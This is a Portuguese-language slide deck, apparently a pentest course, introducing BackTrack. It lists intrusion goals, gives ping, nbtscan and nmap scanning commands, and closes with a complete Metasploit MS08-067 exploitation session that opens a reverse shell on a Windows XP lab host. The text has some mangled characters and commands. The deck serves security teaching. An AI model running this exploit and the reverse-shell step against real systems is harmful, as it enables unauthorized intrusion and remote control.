Sunteți pe pagina 1din 18

O que o BackTrack ?

uma plataforma de testes de penetrao e


auditoria de segurana que possui ferramentas
avanadas para identificar, detectar e explorar
as vulnerabilidades descobertas no alvo que
est no ambiente de rede.

Motivos para penetrar nos sistemas

Obter mais informaes sobre o alvo

Obter um prompt de comando remoto

Iniciar ou interromper servios ou aplicaes

Obter acesso aos sistemas

Desativar registro ou controles de segurana

Capturar telas

Acessar arquivos confidenciais

Enviar e-mail como se fosse administrador

Realizar ataques de injeo SQL

Lanar ataque DoS

Realizar upload de arquivo provocando a penetrao no


sistema

Processo de Penteste

Etapa 3
Target Discovery
(Descoberta do Alvo)

Ferramenta ping
Ferramenta usada para verifiicar
determinado HOST est ativo.

se

um

A mesma envia um ECHO ICMP(Internet Control


Message Protocol) para o HOST de destino.
O HOST de destino responde sobre a sua
disponibilidade atraves de ECHO REPLAY ICMP

root@bt:~#ping -c 2 100 192.168.5.102

Ferramenta genlist
Ferramenta usada para obter uma lista de
HOSTS atravs de solicitao ping

root@bt:~#genlist s 192.168.56.\*

Ferramenta nbtscan
Ferramenta usada para scanner endereos IP para o
NETBIOS.
Gera um relatrio contendo o endereo IP, nome do
computador no NETBIOS, servio disponivel, registro
de usuarios e endereo MAC

root@bt:~#nbtscan 192.168.56.1-254

Etapa 4
Enumerating Target
(Enumerando o Alvo)

Port Scanning

Ferramenta Autoscan
Ferramenta de rede baseada em graficos que
podem ser usados para encontrar HOSTS
ativos,assim como, portas ,sistema operacional.

Ferramenta nmap
Ferramenta mais utilizada pelos profissionais de TI
para descobertas de portas, sistema operacional,
protocolo (Fingerprint).

Descoberta do sistema operacional


root@bt:~#nmap -O 192.168.56.101
Forando fingerprint atravs de Pilhas
root@bt:~#nmap -O2 192.168.56.101

Ferramenta nmap
Especificando portas
root@bt:~#nmap -sN -p 22,25,80,3306
192.168.56.101
Apresenta a verso dos servios
root@bt:~#nmap -sV 192.168.56.101

Ferramenta nmap
Ferramenta mais utilizada pelos profissionais de TI
para descobertas de portas, sistema operacional,
protocolo (Fingerprint).

Varrendo uma faixa de IPS


root@bt:~#nmap 192.168.56.100-120

Ferramenta zenmap
GUI da ferramenta nmap

Etapa 7
Target Exploitation

Ferramentas
Exploit: codigo desenvolvido para tirar vantagem de
uma vulnerabilidade do sistema
Payload:codigo malicioso que faz parte de um
Exploit e executa comandos do sistema alvo

Reverse Shell
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 ->
192.168.0.7:1027) at Sat Nov 13 22:59:02 +0000 2010
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

S-ar putea să vă placă și